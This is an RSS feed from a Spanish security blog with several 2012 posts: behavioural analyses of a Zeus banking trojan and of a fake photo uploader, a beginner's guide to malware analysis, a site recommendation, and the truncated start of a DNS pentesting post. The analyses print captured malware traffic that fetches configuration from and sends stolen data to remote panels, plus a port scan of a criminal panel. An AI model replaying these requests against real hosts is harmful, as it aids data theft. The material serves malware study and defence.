<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Caminando entre bits...</title>
	<atom:link href="http://seifreed.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://seifreed.com</link>
	<description></description>
	<lastBuildDate>Tue, 14 Feb 2012 07:04:20 +0000</lastBuildDate>
	<language>es</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='seifreed.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>Caminando entre bits...</title>
		<link>http://seifreed.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://seifreed.com/osd.xml" title="Caminando entre bits..." />
	<atom:link rel='hub' href='http://seifreed.com/?pushpress=hub'/>
		<item>
		<title>Detrás de un panel de Zeus</title>
		<link>http://seifreed.com/2012/02/14/detras-de-un-panel-de-zeus/</link>
		<comments>http://seifreed.com/2012/02/14/detras-de-un-panel-de-zeus/#comments</comments>
		<pubDate>Tue, 14 Feb 2012 07:00:14 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[ecrime]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[zeus]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=4071</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! Existe un grupo determinado de troyanos que se dedican al Home banking, la banca electrónica. Algunos actúan como Keyloguer, capturan los datos introducidos por el usuario y estos datos son enviados a un panel web, enviados por correo etc.. Otro tipos de troyanos interactúan directamente con la Banca, solicitan los [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4071&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>Existe un grupo determinado de troyanos que se dedican al Home banking, la banca electrónica. Algunos actúan como Keyloguer, capturan los datos introducidos por el usuario y estos datos son enviados a un panel web, enviados por correo etc..</p>
<p>Otro tipos de troyanos interactúan directamente con la Banca, solicitan los datos al usuario y, además conducen al usuario a la web legítima sin que este se percate de lo ocurrido. Este tipo de infecciones pueden venir a través de correo electrónico o pueden haber páginas webs maliciosas que contengan enlaces a software malicioso.</p>
<p>En este caso hay una máquina virtual con un software creado con un Builder del troyano <a href="http://blog.s21sec.com/2011/06/evolucion-ramificacion-y-reflexiones.html">Zeus</a>.</p>
<p>Estos Builder cargan una configuración al binario, de donde ha de enviar los datos, el nombre del binario.. etc  Este software lo distribuyen mediante diferentes vías y consiguen infectar usuarios que envían los datos donde el criminal tenga un panel web esperando la recogida de información.</p>
<p>En la máquina Windows XP que está infectada con Zeus, el cambio en el sistema de archivos que ha echo el troyano, lo mas significativo es:</p>
<p><img class="aligncenter" src="http://img21.imageshack.us/img21/9692/archivosmodificados.png" alt="" width="445" height="139" /></p>
<p>El binario se ha hecho una copia y guardado en la carpeta Datos de Programa, entre otras cosas.</p>
<p>En las conexiones de red, el troyano intentará conectarse con el panel de control que el criminal haya configurado con el Builder y descargarse la configuración.</p>
<blockquote><p>GET /mm.bin HTTP/1.1<br />
Accept: */*<br />
Connection: Close<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)<br />
Host: ejemplo.ru<br />
Cache-Control: no-cache</p></blockquote>
<p>El troyano se descarga la configuración que analizaremos en otro artículo.</p>
<p>También podemos ver como envía los datos al panel</p>
<blockquote><p>POST /panel/acc.php HTTP/1.1<br />
Accept: */*<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)<br />
Host: ejemplo.ru<br />
Content-Length: 387<br />
Connection: Keep-Alive<br />
Cache-Control: no-cache</p></blockquote>
<p>Ahora extraeremos los datos mediante strings del fichero así podemos ver algo de información del binario.</p>
<p>Aquí tenemos la cabecera de los strings extraídos:</p>
<blockquote><p>!This program cannot be run in DOS mode.<br />
Rich<br />
UPX0<br />
UPX1<br />
.rsrc<br />
3.03</p></blockquote>
<p>Se puede ver que el troyano ha sido tratado con un <a href="http://upx.sourceforge.net/">packer </a>estos packer dificultan el análisis por parte de los reversers. UPX es un compresor Open Source, pero en el caso de Malware se usa una versión modificada que dificulta la ingeniería inversa.</p>
<p>Seguramente el Builder lo lleva incorporado.</p>
<p>Hay mas cadenas interesantes que se pueden extraer del binario en cuestión:</p>
<blockquote><p>XPTPSW<br />
KERNEL32.DLL<br />
advapi32.dll<br />
user32.dll<br />
LoadLibraryA<br />
GetProcAddress<br />
VirtualProtect<br />
VirtualAlloc<br />
VirtualFree<br />
ExitProcess<br />
RegCloseKey<br />
FlashWindowEx<br />
$/x7<br />
6Rg)$\!<br />
`7y5Gaz</p></blockquote>
<p>Vaya, dll propias de sistema que interactúan con el troyano..</p>
<p>En el panel existen estos puertos abiertos:</p>
<blockquote><p>22/tcp open ssh syn-ack<br />
25/tcp open smtp syn-ack<br />
80/tcp open http syn-ack<br />
111/tcp open rpcbind syn-ack<br />
427/tcp open svrloc syn-ack<br />
631/tcp open ipp syn-ack<br />
1720/tcp filtered H.323/Q.931 no-response<br />
2000/tcp filtered cisco-sccp no-response<br />
5060/tcp filtered sip no-response</p></blockquote>
<p>En el siguiente capítulo seguiremos tratando con este troyano, espero que os haya gustado.</p>
<p>Saludos!!</p>
<br />Filed under: <a href='http://seifreed.com/category/malware-2/ecrime/'>ecrime</a>, <a href='http://seifreed.com/category/malware-2/'>Malware</a> Tagged: <a href='http://seifreed.com/tag/ecrime/'>ecrime</a>, <a href='http://seifreed.com/tag/malware/'>malware</a>, <a href='http://seifreed.com/tag/zeus/'>zeus</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/4071/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/4071/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/4071/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/4071/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/4071/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/4071/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/4071/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/4071/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/4071/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/4071/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/4071/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/4071/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/4071/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/4071/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4071&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2012/02/14/detras-de-un-panel-de-zeus/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>

		<media:content url="http://img21.imageshack.us/img21/9692/archivosmodificados.png" medium="image" />
	</item>
		<item>
		<title>¿Que se esconde detrás del Uploader de fotos?</title>
		<link>http://seifreed.com/2012/02/13/que-se-esconde-detras-del-uploader-de-fotos/</link>
		<comments>http://seifreed.com/2012/02/13/que-se-esconde-detras-del-uploader-de-fotos/#comments</comments>
		<pubDate>Mon, 13 Feb 2012 07:00:00 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[Malware]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[ecrime]]></category>
		<category><![CDATA[malware]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=4068</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! Por ser el informático de la familia te encuentras muchas veces con mucho malware que tienes que quitar, aunque si que es verdad los últimos ordenadores que me he encontrado no solo he limpiado el Malware si no, que, además me he quedado con el binario para jugar con él [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4068&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>Por ser el informático de la familia te encuentras muchas veces con mucho malware que tienes que quitar, aunque si que es verdad los últimos ordenadores que me he encontrado no solo he limpiado el Malware si no, que, además me he quedado con el binario para jugar con él <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> . Esta última vez se trata de un software que simula ser un uploader de fotos. Quería saber como funcionaba el Malware así que preparé mi máquina virtual y lo ejecuté a ver que pasaba.</p>
<p>No solo el Software no funcionaba como Uploader sino, que, además generaba cierta actividad de red.</p>
<p>Las peticiones DNS:</p>
<p><img class="aligncenter" src="http://img546.imageshack.us/img546/7477/dnsquerys.png" alt="" width="800" height="53" /></p>
<p>Esto ya me resultó raro, aunque tratandose de Malware.. es normal. Pero entonces observe estas peticiones</p>
<p>Peticiones HTTP:</p>
<p><img class="aligncenter" src="http://img828.imageshack.us/img828/9250/httpconnections.png" alt="" width="800" height="92" /></p>
<p>Al parecer se añade un usuario a una web remota. El usuario es el nombre de mi pc, y la password la licencia de Windows. Es decir, envía a una base de datos remota mi licencia de Windows. Esto no lo había visto ahora, mola.</p>
<p>Quería saber como Robtex si se trataba de un sistema autónomo y había mas hosts cometiendo fraude.</p>
<p><img class="aligncenter" src="http://img15.imageshack.us/img15/5505/robtexipmod.png" alt="" width="714" height="170" /></p>
<p>Alojando en Rusia, como no <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> !</p>
<p>En la página web existen diferentes directorios, entre ellos:</p>
<p><img class="aligncenter" src="http://img827.imageshack.us/img827/8805/picturemod.png" alt="" width="600" height="186" /></p>
<p>Este es el Software que se descarga la gente que accede por error a la URI en cuestión</p>
<p>De las conexiones capturadas con Wireshark se puede ver:</p>
<blockquote><p>GET /home?action=add&amp;username=MI%20PC&amp;password=password&amp;app=Windows&amp;pcname=PERSONAL-23AB6E&amp;sitename=Microsoft HTTP/1.1<br />
User-Agent: HardCore Software For : Public<br />
Host: ejemplo.com</p>
<p>HTTP/1.1 301 Moved Permanently<br />
Date: Sun, 12 Feb 2012 14:24:02 GMT<br />
Server: LiteSpeed<br />
Connection: Keep-Alive<br />
Keep-Alive: timeout=5, max=100<br />
Location: http://cantportforward.com/home/?action=add&amp;username=MI%20PC&amp;password=password&amp;app=Windows&amp;pcname=PERSONAL-23AB6E&amp;sitename=Microsoft<br />
Content-Type: text/html<br />
Content-Length: 413</p>
<p>&lt;html&gt;<br />
&lt;head&gt;&lt;title&gt; 301 Moved Permanently<br />
&lt;/title&gt;&lt;/head&gt;<br />
&lt;body&gt;&lt;h1&gt; 301 Moved Permanently<br />
&lt;/h1&gt;<br />
The document has been permanently moved to &lt;A HREF=&#8221;%s&#8221;&gt;here&lt;/A&gt;.&lt;hr /&gt;<br />
Powered By &lt;a href=&#8217;http://www.litespeedtech.com&#8217;&gt;LiteSpeed Web Server&lt;/a&gt;&lt;br /&gt;<br />
&lt;font face=&#8221;Verdana, Arial, Helvetica&#8221; size=-1&gt;LiteSpeed Technologies is not responsible for administration and contents of this web site!&lt;/font&gt;&lt;/body&gt;&lt;/html&gt;<br />
GET /home/?action=add&amp;username=MI%20PC&amp;password=ejemplo&amp;app=Windows&amp;pcname=PERSONAL-23AB6E&amp;sitename=Microsoft HTTP/1.1<br />
User-Agent:  Public<br />
Host: ejemplo.com<br />
Connection: Keep-Alive</p>
<p>HTTP/1.1 200 OK<br />
Date: Sun, 12 Feb 2012 14:24:02 GMT<br />
Server: LiteSpeed<br />
Connection: close<br />
Set-Cookie: PHPSESSID=a8711e0c5081845ef1838155557b3714; path=/<br />
Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0<br />
Pragma: no-cache<br />
Content-Type: text/html<br />
Content-Length: 0</p></blockquote>
<p>En otro de los directorios,a  los que puedes acceder te encuentras con esta página:</p>
<p><img class="aligncenter" src="http://img837.imageshack.us/img837/1388/panelv.png" alt="" width="800" height="231" /></p>
<p>Si se observa el código fuente, una vez loqueado puedes hacer las siguientes búsquedas:</p>
<blockquote>
<pre>&lt;form name='search' method='GET' action='index.php?action=search'&gt;
		&lt;strong&gt;Search for:&lt;/strong&gt; &lt;input type='text' name='query' size='20' value="xp"&gt; In: &lt;select name='in'&gt;</pre>
<pre>		&lt;option  value='0'&gt;Softwares&lt;/option&gt;
		&lt;option  value='1'&gt;Sitename&lt;/option&gt;
		&lt;option selected=selected value='2'&gt;Username&lt;/option&gt;
		&lt;option  value='3'&gt;Password&lt;/option&gt;
		&lt;option  value='4'&gt;PC Name&lt;/option&gt;
		&lt;option  value='5'&gt;IP Address&lt;/option&gt;</pre>
<pre>		&lt;option  value='6'&gt;Date&lt;/option&gt;
		&lt;/select&gt;
		&lt;input type='submit' value='Search' name='search'&gt;
	&lt;/form&gt;</pre>
</blockquote>
<p>Parece ser que se confirma mi sospecha de que es una base de datos donde se guardan ordenadores junto con sus licencias.</p>
<p>Para acabar, el panel será vulnerable a SQL Injection? El servidor tendrá alguna vulnerabilidad que pueda ser explotada?</p>
<p>En fin.. seguiremos trabajando en ello</p>
<br />Filed under: <a href='http://seifreed.com/category/malware-2/'>Malware</a>, <a href='http://seifreed.com/category/seguridad/'>Seguridad</a> Tagged: <a href='http://seifreed.com/tag/ecrime/'>ecrime</a>, <a href='http://seifreed.com/tag/malware/'>malware</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/4068/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/4068/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/4068/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/4068/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/4068/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/4068/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/4068/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/4068/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/4068/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/4068/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/4068/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/4068/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/4068/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/4068/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4068&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2012/02/13/que-se-esconde-detras-del-uploader-de-fotos/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>

		<media:content url="http://img546.imageshack.us/img546/7477/dnsquerys.png" medium="image" />

		<media:content url="http://img828.imageshack.us/img828/9250/httpconnections.png" medium="image" />

		<media:content url="http://img15.imageshack.us/img15/5505/robtexipmod.png" medium="image" />

		<media:content url="http://img827.imageshack.us/img827/8805/picturemod.png" medium="image" />

		<media:content url="http://img837.imageshack.us/img837/1388/panelv.png" medium="image" />
	</item>
		<item>
		<title>Recomendación de Domingo: Cyberhades</title>
		<link>http://seifreed.com/2012/02/12/recomendacion-de-domingo-cyberhades/</link>
		<comments>http://seifreed.com/2012/02/12/recomendacion-de-domingo-cyberhades/#comments</comments>
		<pubDate>Sun, 12 Feb 2012 08:00:47 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[Personal]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Cyberhades]]></category>
		<category><![CDATA[recomendaciones]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=4066</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! Hoy que estamos de Domingo, aunque el artículo no lo esté escribiendo hoy.. quiero recomendaros una de las webs que MAS me gustan, que MAS se actualizan y que MAS temática variada puedes encontrar. Siempre, siempre te sorprenden con material nuevo. Y al menos, a mi, me es imposible poder [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4066&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>Hoy que estamos de Domingo, aunque el artículo no lo esté escribiendo hoy.. quiero recomendaros una de las webs que MAS me gustan, que MAS se actualizan y que MAS temática variada puedes encontrar. Siempre, siempre te sorprenden con material nuevo. Y al menos, a mi, me es imposible poder digerir bien todo lo que exponen, tutoriales que recomiendan etc.. La verdad es que en mi Reader tengo como 20 páginas por leer de ellos, de tutoriales, de cosas de Star Wars.. etc..</p>
<p><img class="aligncenter" src="http://www.cyberhades.com/wp-content/themes/Benz/images/header-bg.jpg" alt="" width="1000" height="406" /></p>
<p>Os recomiendo seguir esta web si todavía NO la conocéis.. la verdad es que os dejará helados de la calidad del sitio web.</p>
<p>Además de en el área de seguridad siempre sorprenderte con las últimas noticias, algún que otro análisis de un CFP que hallan pasado, y suelen hacer las explicaciones de manera muy digerible para todos.</p>
<p>Para ir a Cyberhades podéis ir desde aquí:</p>
<p><a href="http://www.cyberhades.com">Cyberhades</a></p>
<br />Filed under: <a href='http://seifreed.com/category/personal/'>Personal</a> Tagged: <a href='http://seifreed.com/tag/cyberhades/'>Cyberhades</a>, <a href='http://seifreed.com/tag/recomendaciones/'>recomendaciones</a>, <a href='http://seifreed.com/tag/seguridad/'>Seguridad</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/4066/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/4066/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/4066/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/4066/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/4066/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/4066/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/4066/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/4066/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/4066/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/4066/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/4066/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/4066/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/4066/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/4066/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4066&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2012/02/12/recomendacion-de-domingo-cyberhades/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>

		<media:content url="http://www.cyberhades.com/wp-content/themes/Benz/images/header-bg.jpg" medium="image" />
	</item>
		<item>
		<title>Empezando con el análisis de malware</title>
		<link>http://seifreed.com/2012/02/11/empezando-con-el-analisis-de-malware/</link>
		<comments>http://seifreed.com/2012/02/11/empezando-con-el-analisis-de-malware/#comments</comments>
		<pubDate>Sat, 11 Feb 2012 08:00:56 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[análisis]]></category>
		<category><![CDATA[ecrime]]></category>
		<category><![CDATA[malware]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=4063</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! Desde que entré a trabajar en el departamento de ecrime en S21Sec sabía que me acabaría tocando analizar malware. Es algo que me tenía bastante intrigado, pues pensaba que solo se basaría en hacer Ingeniería inversa. Y eso me daba pánico, porque es algo que no he echo en mi [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4063&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>Desde que entré a trabajar en el <a href="http://www.s21sec.com/">departamento de ecrime en S21Sec</a> sabía que me acabaría tocando analizar malware. Es algo que me tenía bastante intrigado, pues pensaba que solo se basaría en hacer Ingeniería inversa. Y eso me daba pánico, porque es algo que no he echo en mi vida y ya os aseguro que viendo algún compañero de la empresa como lo realiza..da miedo&#8230; jeje.</p>
<p>Los primeros pasos que hice para analizar un  malware es hacer un análisis de comportamiento del mismo, esto se puede hacer por ejemplo desde una máquina virtual y con un Wireshark capturando el tráfico desde fuera, siempre y cuando el Malware en cuestión no tenga una protección de las que detecta que está siendo ejecutado en una máquina virtual. demás existen software que protegen el ejecutable los llamados packers que dificultan el análisis del binario mediante ingenría inversa, pero eso ya lo veremos mas adelante. En este blog ya he analizado algún que otro Malware viendo que conexiones hacía que ficheros de sistema cambiaba etc..</p>
<p>De eso se trata en parte un <a href="http://seifreed.com/2011/09/06/analisis-de-comportamiento-de-un-troyano-i/">análisis de comportamiento de Malware</a>. Yo para la gente que quiera empezar lo haría así:</p>
<ol>
<li>Tener una máquina virtual Windows en Host-Only, preferiblemente.</li>
<li>Tener instalado <a href="http://www.softpedia.com/get/System/System-Info/InstallRite.shtml">InstallRit</a>e en la máquina virtual.</li>
<li>Tener capturando la actividad de la tarjeta de red con Wireshark</li>
</ol>
<p>Estos 3 pasos básicos ya nos pueden dar una idea de que hace el malware en cuestión.</p>
<p>Si recordamos el artículo de <a href="seifreed.com/2011/10/02/analizando-morto/">analizando morto, </a>la cantidad de conexiones que hacía el troyano, vuelvo a poner la imagen que tenía en el artículo:</p>
<p><img class="aligncenter" src="http://img137.imageshack.us/img137/2339/conexiones.png" alt="" width="800" height="315" /></p>
<p>Y los cambios que hacía en sistema, por ejemplo con InstallRite</p>
<p><img class="aligncenter" src="http://img641.imageshack.us/img641/6369/installrite1.png" alt="" width="800" height="254" /></p>
<p>&nbsp;</p>
<p>Este artículo de hoy es para comentar dos cosas, la primera es que para los que quieran empezar a hacer análisis de malware no os preocupéis si no sabéis hacer ingeniería inversa, aunque os animo a que aprendáis si os vais a querer dedicar, lo segundo es que analizando como se comporta el troyano en si ya sabemos cual es su modus operandi, si el malware se actualiza, de donde etc..</p>
<p>Así que ánimos</p>
<p>Saludos</p>
<p>&nbsp;</p>
<br />Filed under: <a href='http://seifreed.com/category/seguridad/'>Seguridad</a> Tagged: <a href='http://seifreed.com/tag/analisis/'>análisis</a>, <a href='http://seifreed.com/tag/ecrime/'>ecrime</a>, <a href='http://seifreed.com/tag/malware/'>malware</a>, <a href='http://seifreed.com/tag/seguridad/'>Seguridad</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/4063/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/4063/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/4063/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/4063/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/4063/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/4063/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/4063/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/4063/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/4063/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/4063/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/4063/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/4063/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/4063/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/4063/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4063&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2012/02/11/empezando-con-el-analisis-de-malware/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>

		<media:content url="http://img137.imageshack.us/img137/2339/conexiones.png" medium="image" />

		<media:content url="http://img641.imageshack.us/img641/6369/installrite1.png" medium="image" />
	</item>
		<item>
		<title>Pentesting al DNS, dnsenum</title>
		<link>http://seifreed.com/2012/02/10/pentesting-al-dns-dnsenum/</link>
		<comments>http://seifreed.com/2012/02/10/pentesting-al-dns-dnsenum/#comments</comments>
		<pubDate>Fri, 10 Feb 2012 07:18:30 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[DNS]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[enumeración]]></category>
		<category><![CDATA[pentesting]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=4061</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! &#8220;La información es poder&#8221;, y que razón tenía Francis BACON al decir esta frase. Cuando realizas una auditoría, siempre tenemos el primero apartado, el apartado de Fingerprinting, en el cual se comprueba entre otras cosas que información pública contiene el target objetivo. Una de las cosas que se pueden mirar es [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4061&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
